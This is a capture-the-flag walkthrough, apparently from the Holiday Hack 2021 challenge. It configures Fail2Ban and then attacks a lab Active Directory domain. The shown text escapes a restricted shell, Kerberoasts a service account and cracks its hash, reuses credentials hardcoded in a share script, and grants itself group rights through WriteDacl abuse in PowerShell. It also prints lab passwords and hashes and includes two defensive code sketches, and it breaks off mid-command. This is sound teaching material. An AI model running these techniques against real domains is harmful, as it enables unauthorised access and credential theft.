Objective

image-20220107151025566

Terminal - HoHo … No

Challenge

Eve Snowshoes is waiting in Santa’s office with the HoHo…No terminal:

image-20220107105320833

Hey there, how’s it going? I’m Eve Snowshoes.

Lately I’ve been spending a lot of cycles worrying about what’s going on next door.

Before that, I was checking out Fail2Ban.

It’s this slick log scanning tool for Apache web servers.

If you can complete this terminal challenge, I’d be happy to give you some things I’ve learned about Kerberoasting and Active Directory permissions!

Why don’t you do some work with Fail2Ban on this Cranberry Pi terminal first, then we’ll talk Kerberoasting and Active Directory. OK?

The terminal header is all about Fail2Ban:

image-20220107105528008

Fail2Ban is designed to parse logs and take a defined action when a given log entry associated with a given IP occurs too many times in a defined period. For example, if there are more than 5 failed SSH logins from the same IP in 2 minutes, block that IP for one hour in iptables.

This challenge asks that I parse a custom log, looking for 10 or more failures in an hour, and pass the offending IPs to /root/naughtylist.

Solution

The full solution for this challenge is in this video:

Identify Malicious Logs

Using grep to look at the log, I identified four different types of malicious log entries:

  • Failed login:

    2022-01-03 22:10:22 Failed login from 101.103.18.26 for alabaster

  • Rejected:

    2022-01-03 22:10:29 Login from 20.252.236.61 rejected due to unknown user name

  • Invalid:

    2022-01-03 22:10:30 Invalid heartbeat 'delta' from 68.175.124.205

  • Malformed:

    2022-01-03 22:10:33 101.103.18.26 sent a malformed request

Configure Fail2Ban

Andy Smith gave a talk at this year’s KringleCon on Fail2Ban, and it’s a good walkthrough of how to configure it. I’ll need to create three files: a filter, an action, and a jail.

I’ll start with a filter, /etc/fail2ban/filter.d/df.conf:

[Definition]
failregex = Failed login from <HOST> for .+$
            Login from <HOST> rejected due to unknown user name$
            Invalid heartbeat '.+' from <HOST>$
            <HOST> sent a malformed request$

The four lines are the four patterns to match in the log data; Fail2Ban substitutes its own host-matching pattern for <HOST>. I can test the filter with fail2ban-regex (shown in the video).

Next, I need an action, which defines what happens when an IP is banned (and unbanned), /etc/fail2ban/action.d/df.conf:

[Definition]
actionban   = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>

Finally, a jail file ties them together and describes how they interact, /etc/fail2ban/jail.d/df.conf:

[df]
enabled = true
logpath = /var/log/hohono.log
findtime = 60m
maxretry = 10
filter = df
action = df
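To see how the filter and the jail’s findtime/maxretry settings above combine into a ban decision, here is an added Python re-implementation of that counting logic run over a constructed log. It is not Fail2Ban’s own code and not part of the original writeup; the IPv4 stand-in for <HOST>, the sliding-window model, and the sample log lines are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# The four failregex lines from filter.d/df.conf. Fail2Ban swaps its own
# host pattern in for <HOST>; a plain IPv4 pattern stands in for it here.
FAILREGEX = [
    r"Failed login from <HOST> for .+$",
    r"Login from <HOST> rejected due to unknown user name$",
    r"Invalid heartbeat '.+' from <HOST>$",
    r"<HOST> sent a malformed request$",
]
HOST = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"
PATTERNS = [re.compile(p.replace("<HOST>", HOST)) for p in FAILREGEX]

# Fail2Ban strips the timestamp with its datepattern before applying failregex;
# this does the same for the "YYYY-MM-DD HH:MM:SS" prefix seen in hohono.log.
DATE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<msg>.*)$")

FINDTIME = timedelta(minutes=60)   # jail.d/df.conf: findtime = 60m
MAXRETRY = 10                      # jail.d/df.conf: maxretry = 10


def parse_line(line):
    """Return (timestamp, host) when a line matches one of the failregex
    patterns, or None for lines the filter ignores."""
    m = DATE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
    for pat in PATTERNS:
        hit = pat.match(m.group("msg"))
        if hit:
            return ts, hit.group("host")
    return None


def find_bans(lines, findtime=FINDTIME, maxretry=MAXRETRY):
    """Replay log lines in order and return {host: time_of_ban} for every
    host that accumulates maxretry failures inside a sliding findtime window
    (a simplified model of how the jail decides to call actionban)."""
    recent = defaultdict(deque)   # host -> failure timestamps still in the window
    bans = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host = parsed
        if host in bans:
            continue              # already handed to actionban; nothing more to count
        window = recent[host]
        window.append(ts)
        while ts - window[0] > findtime:
            window.popleft()
        if len(window) >= maxretry:
            bans[host] = ts
    return bans


def sample_log():
    """Constructed sample log (not the challenge's hohono.log): one benign
    line, a host bursting 10 failures in 10 minutes, and a host failing
    10 times at 13-minute intervals, which never reaches 10 in any hour."""
    base = datetime(2022, 1, 3, 22, 10, 0)
    formats = [
        "Failed login from {h} for alabaster",
        "Login from {h} rejected due to unknown user name",
        "Invalid heartbeat 'delta' from {h}",
        "{h} sent a malformed request",
    ]
    lines = ["2022-01-03 22:09:59 Successful login from 10.0.0.9 for alabaster"]
    for i in range(10):
        burst = base + timedelta(minutes=i)
        slow = base + timedelta(minutes=13 * i)
        lines.append(f"{burst:%Y-%m-%d %H:%M:%S} " + formats[i % 4].format(h="101.103.18.26"))
        lines.append(f"{slow:%Y-%m-%d %H:%M:%S} " + formats[i % 4].format(h="20.252.236.61"))
    return sorted(lines)          # the fixed-width timestamp sorts chronologically


if __name__ == "__main__":
    for host, when in find_bans(sample_log()).items():
        print(f"/root/naughtylist add {host}   # triggered at {when}")
```

Only the bursting host is banned; the slow host never has ten failures inside any sixty-minute window, which is exactly the distinction findtime is there to make.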

Run It

To put these in place, I’ll restart the Fail2Ban service (service fail2ban restart), and then I’ll run /root/naughtylist refresh to replay the logs and solve the challenge.

Kerberoasting on an Open Fire

Hints

Eve has gratitude and hints to offer:

Fantastic! Thanks for the help!

Hey, would you like to know more about Kerberoasting and Active Directory permissions abuse?

There’s a great talk by Chris Davis on this exact subject!

There are also plenty of resources available to learn more about Kerberoasting specifically.

If you have any trouble finding the domain controller on the 10.X.X.X network, remember that, when not running as root, nmap default probing relies on connecting to TCP 80 and 443.

Got a hash that won’t crack with your wordlist? OneRuleToRuleThemAll.rule is a great way to grow your keyspace.

Where’d you get your wordlist? CeWL might generate a great wordlist from the ElfU website, but it will ignore digits in terms by default.

So, apropos of nothing, have you ever known system administrators who store credentials in scripts? I know, I know, you understand the folly and would never do it!

The easy way to investigate Active Directory misconfigurations (for Blue and Red alike!) is with Bloodhound, but there are native methods as well.

Oh, and one last thing: once you’ve granted permissions to your user, it might take up to five minutes for it to propagate throughout the domain.

A record seven more hints unlock in my badge:

  • Check out Chris Davis’ talk and scripts on Kerberoasting and Active Directory permissions abuse.
  • Learn about Kerberoasting to leverage domain credentials to get usernames and crackable hashes for service accounts.
  • There will be some 10.X.X.X networks in your routing tables that may be interesting. Also, consider adding -PS22,445 to your nmap scans to “fix” default probing for unprivileged scans.
  • OneRuleToRuleThemAll.rule is great for mangling when a password dictionary isn’t enough.
  • CeWL can generate some great wordlists from a website, but it will ignore digits in terms by default.
  • Administrators often store credentials in scripts. These can be co-opted by an attacker for other purposes!
  • Investigating Active Directory errors is harder without Bloodhound, but there are native methods.

Solution

There’s a full walkthrough of solving this challenge in this video:

A summary of the steps follows here as well.

Get Creds

Visiting the page redirects to /register, which has a registration form.

image-20220107131211007

On submitting the form, I’m given a username and credentials for the grading server:

image-20220107131249357

Escape the Limited Shell

When I connect, I’m in some kind of custom shell:

===================================================
=      Elf University Student Grades Portal       =
=          (Reverts Everyday 12am EST)            =
===================================================
1. Print Current Courses/Grades.
e. Exit
: 

Entering 1:

0  Shortname                    Description  Grade
==================================================
1    WHOL101       World Holiday Literature     F 
2    NPAR301    North Pole Art Appreciation     D+
3    REIH201             Reindeer Husbandry     F 
4    GEOG101      Geometry of Gift-Wrapping     B-
5    SLPE101  Sleigh Propulsion Engineering     C+
Press Enter to continue...

Anything else clears the screen and reprints the menu, except e, which exits, closing the SSH connection.

Ctrl-z and Ctrl-c both print:

You may only type 'exit' to leave the exam

Ctrl-d, however, drops to an interactive Python prompt:

===================================================
=      Elf University Student Grades Portal       =
=          (Reverts Everyday 12am EST)            =
===================================================
1. Print Current Courses/Grades.
e. Exit
: Traceback (most recent call last):
  File "/opt/grading_system", line 41, in <module>
    main()
  File "/opt/grading_system", line 26, in main
    a = input(": ").lower().strip()
EOFError
>>> 

And I can drop to a bash shell:

>>> os.system("bash")
rncztspfgz@grades:~$ 

I can also change my user’s login shell from the grading program to bash with chsh.
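The traceback above is the classic failure of a menu shell: input() raises EOFError on Ctrl-D, the exception escapes main(), and because the portal is evidently run under an interactive interpreter, the crash lands in a REPL rather than a closed session. As an added example, not the challenge’s /opt/grading_system, here is a hardened version of that loop; the constructed course table and the scripted_input helper are assumptions for testing.

```python
import os

MENU = (
    "===================================================\n"
    "=      Elf University Student Grades Portal       =\n"
    "===================================================\n"
    "1. Print Current Courses/Grades.\n"
    "e. Exit"
)

# Constructed sample grades standing in for whatever the real portal reads.
COURSES = [
    ("WHOL101", "World Holiday Literature", "F"),
    ("NPAR301", "North Pole Art Appreciation", "D+"),
]


def render_grades(courses):
    """Format the grade table as text (returned, not printed, so it can be tested)."""
    fmt = "{:<3}{:<10}{:>32}  {}"
    rows = [fmt.format("#", "Shortname", "Description", "Grade"), "=" * 50]
    for n, (short, desc, grade) in enumerate(courses, 1):
        rows.append(fmt.format(n, short, desc, grade))
    return "\n".join(rows)


def handle_choice(raw):
    """Map one line of input to an action; unknown input just redraws the menu."""
    choice = raw.lower().strip()
    if choice == "1":
        return "grades"
    if choice in ("e", "exit"):
        return "exit"
    return "menu"


def run(read_line, write=print):
    """Menu loop. read_line(prompt) behaves like input(): it returns the next
    line or raises EOFError. Returns why the loop ended so it can be tested."""
    while True:
        write(MENU)
        try:
            raw = read_line(": ")
        except EOFError:
            # Ctrl-D. The original left this uncaught and the traceback was the
            # way out of the menu; here it is treated exactly like typing 'exit'.
            return "eof"
        except KeyboardInterrupt:
            # Ctrl-C: stay inside the menu, as the original portal already does.
            write("You may only type 'exit' to leave the exam")
            continue
        action = handle_choice(raw)
        if action == "grades":
            write(render_grades(COURSES))
        elif action == "exit":
            return "exit"


def scripted_input(lines):
    """Build a read_line() that replays a list of lines and then raises
    EOFError, so the loop can be exercised without a terminal."""
    it = iter(lines)

    def read_line(prompt=""):
        try:
            return next(it)
        except StopIteration:
            raise EOFError from None
    return read_line


def main():
    try:
        run(input)
    finally:
        # sys.exit() raises SystemExit, which CPython deliberately ignores when
        # the script was started with `python3 -i` (or PYTHONINSPECT) and drops
        # into a REPL instead; os._exit() ends the process however it was launched.
        os._exit(0)


if __name__ == "__main__":
    main()
```

The unconditional os._exit() is the belt-and-braces part; the real fix is launching the portal without -i, and the chsh escape noted above is closed separately by not listing bash in /etc/shells for these accounts.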

Find Servers

This host’s IP is in the 172.17.0.0/24 subnet. Looking at the routing tables (as suggested by the hints), there are three 10.128.X.0/24 networks:

rncztspfgz@grades:~$ ip route                                  
default via 172.17.0.1 dev eth0                                
10.128.1.0/24 via 172.17.0.1 dev eth0                          
10.128.2.0/24 via 172.17.0.1 dev eth0                          
10.128.3.0/24 via 172.17.0.1 dev eth0                          
172.17.0.0/16 dev eth0 proto kernel scope link src 172.17.0.2

nmap scanning will identify a bunch of hosts, but the two of most interest are DC01 and SHARE30, both on the elfu.local domain:

rncztspfgz@grades:~$ nmap -Pn -sCV 10.128.1.53
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 18:09 UTC
Nmap scan report for hhc21-windows-dc.c.holidayhack2021.internal (10.128.1.53)
Host is up (0.00057s latency).                                                 
Not shown: 988 filtered ports                                                  
PORT     STATE SERVICE       VERSION                                           
53/tcp   open  domain?                                                         
| fingerprint-strings:                                                         
|   DNSVersionBindReqTCP:                                                      
|     version                                                                  
|_    bind                                                                     
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-07 18:09:13Z)                                                                   
135/tcp  open  msrpc         Microsoft Windows RPC                             
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)                                    
445/tcp  open  microsoft-ds?                                                   
464/tcp  open  kpasswd5?                                                       
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped                                                      
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)                                    
3269/tcp open  tcpwrapped                                                      
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:                                                               
|   Target_Name: ELFU                                                          
|   NetBIOS_Domain_Name: ELFU                                                  
|   NetBIOS_Computer_Name: DC01                                                
|   DNS_Domain_Name: elfu.local                                                
|   DNS_Computer_Name: DC01.elfu.local                                         
|   DNS_Tree_Name: elfu.local                                                  
|   Product_Version: 10.0.17763                                                
|_  System_Time: 2022-01-07T18:11:29+00:00                                     
| ssl-cert: Subject: commonName=DC01.elfu.local                                
| Not valid before: 2021-10-28T19:21:37                                        
|_Not valid after:  2022-04-29T19:21:37                                        
|_ssl-date: 2022-01-07T18:12:09+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/7%Time=61D881CE%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");                                                     
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:                                                           
| smb2-security-mode:                                                          
|   2.02:
|_    Message signing enabled and required                                     
| smb2-time:                                                                   
|   date: 2022-01-07T18:11:32                                                  
|_  start_date: N/A                                                            

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                
Nmap done: 1 IP address (1 host up) scanned in 254.17 seconds 

rncztspfgz@grades:~$ nmap -PS22,445 -sCV 10.128.3.30
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 18:37 UTC
Nmap scan report for 10.128.3.30
Host is up (0.00027s latency).                                                 
Not shown: 966 closed ports                                                    
PORT     STATE SERVICE      VERSION                                            
22/tcp   open  ssh          OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:                                                                 
|   2048 ce:7e:b4:4b:bc:b9:39:6f:10:d8:3f:f4:3f:6a:06:ef (RSA)
|   256 eb:a9:4b:ec:04:c0:7a:0e:a3:36:f7:4b:49:d7:de:bf (ECDSA)
|_  256 c1:a9:ac:ad:69:13:b7:b1:23:c7:d4:cc:8f:32:1e:b0 (ED25519)
53/tcp   open  domain       (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:                                                      
|     version                                                                  
|_    bind
80/tcp   open  http         Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10                             
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.128.3.30/register
88/tcp   open  kerberos-sec Heimdal Kerberos (server time: 2022-01-07 18:37:11Z)
135/tcp  open  msrpc        Microsoft Windows RPC                              
139/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: ELFU)
389/tcp  open  ldap         (Anonymous bind OK)                                
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08                                        
|_Not valid after:  2023-09-29T19:30:08                                        
|_ssl-date: 2022-01-07T18:37:25+00:00; -42s from scanner time.
445/tcp  open  netbios-ssn  Samba smbd 4.3.11-Ubuntu (workgroup: ELFU)
464/tcp  open  kpasswd5?                                                       
636/tcp  open  ssl/ldap     (Anonymous bind OK)                                
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08                                        
|_Not valid after:  2023-09-29T19:30:08                                        
|_ssl-date: 2022-01-07T18:37:51+00:00; -16s from scanner time.
1024/tcp open  msrpc        Microsoft Windows RPC
...[snip]...
1044/tcp open  tcpwrapped                                                      
2222/tcp open  ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3268/tcp open  ldap         (Anonymous bind OK)                                
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08                                        
|_Not valid after:  2023-09-29T19:30:08                                        
|_ssl-date: 2022-01-07T18:38:36+00:00; +29s from scanner time.
3269/tcp open  ssl/ldap     (Anonymous bind OK)                                
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08                                        
|_Not valid after:  2023-09-29T19:30:08                                        
|_ssl-date: 2022-01-07T18:37:00+00:00; -1m07s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/7%Time=61D8885C%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,2B,"\0\)\0\x06\x81\x80\0\x01\0\0\0\0\0\x01\x07version\x
SF:04bind\0\0\x10\0\x03\0\0\)\x02\0\0\0\0\0\0\0")%r(DNSStatusRequestTCP,E,
SF:"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");                                      
Service Info: Host: SHARE30; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows                                                    

Host script results:                                                           
|_clock-skew: mean: -13s, deviation: 31s, median: 0s
|_nbstat: NetBIOS name: SHARE30, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)                                                                    
| smb-os-discovery:                                                            
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)                                      
|   Computer name: share30                                                     
|   NetBIOS computer name: SHARE30\x00                                         
|   Domain name: elfu.local                                                    
|   FQDN: share30.elfu.local                                                   
|_  System time: 2022-01-07T18:37:59+00:00                                     
| smb-security-mode:                                                           
|   account_used: <blank>                                                      
|   authentication_level: user                                                 
|   challenge_response: supported                                              
|_  message_signing: required                                                  
| smb2-security-mode:                                                          
|   2.02:                                                                      
|_    Message signing enabled and required                                     
| smb2-time:                                                                   
|   date: 2022-01-07T18:37:59                                                  
|_  start_date: N/A                                                            

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.92 seconds

SHARE30 has two interesting shares:

rncztspfgz@grades:~$ smbclient -L //10.128.3.30                                                                                                               
Enter WORKGROUP\rncztspfgz's password:                                         

        Sharename       Type      Comment                                      
        ---------       ----      -------
        netlogon        Disk
        sysvol          Disk
        elfu_svc_shr    Disk      elfu_svc_shr
        research_dep    Disk      research_dep
        IPC$            IPC       IPC Service (Samba 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available 

research_dep seems like where I’m probably trying to get to eventually.

elfu_svc via Kerberoast

Because I have a domain user, I can find any kerberoastable accounts from the DC using the Impacket script that is conveniently installed on the grading server:

rncztspfgz@grades:~$ GetUserSPNs.py -request -dc-ip 10.128.1.53 elfu.local/rncztspfgz:'Iylbegxmf#'                                                            
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation                                                                                                      
                                                                               
ServicePrincipalName                 Name      MemberOf  PasswordLastSet             LastLogon  Delegation                                                    
-----------------------------------  --------  --------  --------------------------  ---------  ----------                                                    
ldap/elfu_svc/elfu                   elfu_svc            2021-10-29 19:25:04.305279  <never>
ldap/elfu_svc/elfu.local             elfu_svc            2021-10-29 19:25:04.305279  <never>
ldap/elfu_svc.elfu.local/elfu        elfu_svc            2021-10-29 19:25:04.305279  <never>
ldap/elfu_svc.elfu.local/elfu.local  elfu_svc            2021-10-29 19:25:04.305279  <never>

                                                                               
                                                                               
$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$da9854fa969fcfcd7ca524745b0d8bcf$5ad62e78b2fc539722b7c7d97e84dc0d06d585db187316f98eb3c0688b93100dc9eb42a76af01d9340e3a4d527a011c421b22eeda687092d06fe0a44a6b84572abf982acc90e8eefffd31549543dc883af910f2a78da903f231f488028a537179560d3522ad116da25589d9d28e08b5f7f2575
20b4775f09f0e20484b7757250f8f4616748fb1aa0abb7c12c45c4f58ffb5d2162506daebcd651a2d637eff520b974d8021ea5cd5a9d4648ff204f528149bbf7905223b6cb2eeea84ee8e1159da8918bbb33d679d318b4d8fbaebb70b57538a5126217acd70934317d2dea4e27c45fa4089326e11deb13fe2bbd4134f725ffc141040893dc27413feb4e2d4a4f713f669d4aadb50795d0d65380febfce00b
bdc0ab1e119e7a1710035e2081628d7b85be3773e20439741f23c6bc6ce6115f89b4250459b12f70c76e3c7dff17f9de68d36aef4b8ab96da1d0453d523374309c315db2e115e6365400eac57b1f61c8db785354bf906f86322a9c52d32d36ac8ae1df306a51be5a06a70b06bcfda767515be9f2bb7636354d0e0474dba0662ea641c108c0cd3825c9dda78df919cd21cd432684110f0335118d42272fb2a
97b76d5dac062ab7732a159b5b2893fe9e9957b7e1a93b11b32ebded0c8d94f2666454ce515518e7f442b9348f40259e54bd1d385c3206076ba410e7426f50067ce0150e9395ea7e1b5345b998be8d3274e941111346c87b94960ff79360d5feebcce8cb90850682b30d2c054847daac86409d126d418ce37217870c7d4925790fb64f7eb1fa1af2e6d773d535c7a7900eb15dba4f1014a88957d9914ff04
b86c2d9636928126983c1fcfa351f7ec2e996682c662c0f40854b1f96d5900179bfa4d703e82d7d3064375c9676d62717b8dd28a10df4e42c9fa8695441d11f4ec16642f69fced598720d5ea2a66e0a85eb02c72a9cfe778ffbd7ed23597a5e16e45c176e395a035122e08c926f7dc19ac8810e9f664ced36f34f5dda2af81fcabdb0b73fb7c00eea782efc03798b815748c93e2a7bda911ed39ec20df3b5
92190efa9c92cf98f2555749b0e442020661cc5858cddbc32102aa4c91cb198b4bd7eaa779e79bf85f88f8eb59d3beff250f3cd94ac1dacab92a127d337d67d127e673386ca3d5b807c1a9b44e5e039b04e3daaf02fecfc62d1b2e76ce25ab9b263054645eb2eeb7e4551a4a07924132a8288e2ac2bf0237b570722bca9b262b6db812dd2eca92a9b46340ea14bf1b4a0a0c9b004ffcc92853451556f6c3a
97b792fe3279b63d4283dab83554a6d5174ed800e767b6bc53fe393e88d963497811d08e859be078dd9c073a680fe98193edb75c9fccdbc778d76355faea27c95dc997de855e8bccadeab6d25dfdab5496f0e5fbc795815b625a8c7b0f74e428e64cf4cf13b5e90f87d3ffd8d0d4ab01e660087127b53486574

It returns a hash for the elfu_svc account, which matches the share name from SHARE30.

Based on the hints, I’ll generate a wordlist from the elfu website using cewl:

$ /opt/CeWL/cewl.rb --with-numbers https://register.elfu.org/register > wordlist

I’ll use the wordlist plus the hash and the rule suggested in the hints to crack the hash with Hashcat:

$ hashcat -m 13100 -r OneRule.rule hash wordlist
...[snip]...

The password is “Snow2021!”.

remote_elf

I can’t access the DC or the research share, but I can access the elfu_svc_shr:

rncztspfgz@grades:~$ smbclient //10.128.3.30/elfu_svc_shr -U elfu.local\\elfu_svc
Enter ELFU.LOCAL\elfu_svc's password:
Try "help" to get a list of possible commands.
smb: \>

The share has 160 PowerShell scripts in it. I’ll download them all and grep through them for things of interest. Searching for elfu, I get a hit:

rncztspfgz@grades:~/scripts$ grep -i elfu *                             
GetProcessInfo.ps1:$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)

Not only is that a hit, but the script is creating a credential object. The script just runs the Get-Process command on the DC as remote_elf:

$SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Invoke-Command -ComputerName 10.128.1.53 -ScriptBlock { Get-Process } -Credential $aCred -Authentication Negotiate

I’ll use these creds to get a PS session on the DC as remote_elf:

PS /home/rncztspfgz/scripts> $SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
PS /home/rncztspfgz/scripts> $aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7                                        
PS /home/rncztspfgz/scripts> $aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)                    
PS /home/rncztspfgz/scripts> Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred -Authentication Negotiate
[10.128.1.53]: PS C:\Users\remote_elf\Documents>

Bloodhound

Now with three domain users owned, I’ll take a look at what they can control (I actually ran this towards the beginning, but now is when it’s time to look).

I can’t get files to/from the DC, but I can use bloodhound.py from the grading server (after using scp to get it there):

rncztspfgz@grades:~/bh$ python3 ../BloodHound.py/bloodhound.py -c all -u elfu_svc -d elfu.local -p 'Snow2021!' -dc dc01.elfu.local
INFO: Found AD domain: elfu.local
INFO: Connecting to LDAP server: dc01.elfu.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 238 computers
INFO: Connecting to LDAP server: dc01.elfu.local
INFO: Found 246 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.elfu.local
INFO: Querying computer: share30.elfu.local
INFO: Skipping enumeration for share30.elfu.local since it could not be resolved.
INFO: Done in 00M 01S

I’ll scp the resulting files back to my host and open them in BloodHound. After marking each of the users I control as owned, I’ll look at the “First Degree Object Control” for each. remote_elf has a really interesting one:

image-20220107145408969

Access Research Department Share

With WriteDacl on the Research Department group, I can add users to it. PowerView makes this easy, but since I can’t get files onto the DC, I’ll use the scripts from Chris Davis’ gist. The first set of commands runs as remote_elf to give my user GenericAll over the group:

[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $username = "rncztspfgz"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $propGUID = [guid]'00000000-0000-0000-0000-000000000000'
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $secOptions = $domainDirEntry.get_Options()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.RefreshCache()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()

Next, I’ll use that new power to add myself to the group:

[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $username = "rncztspfgz"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $password = "Iylbegxmf#"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
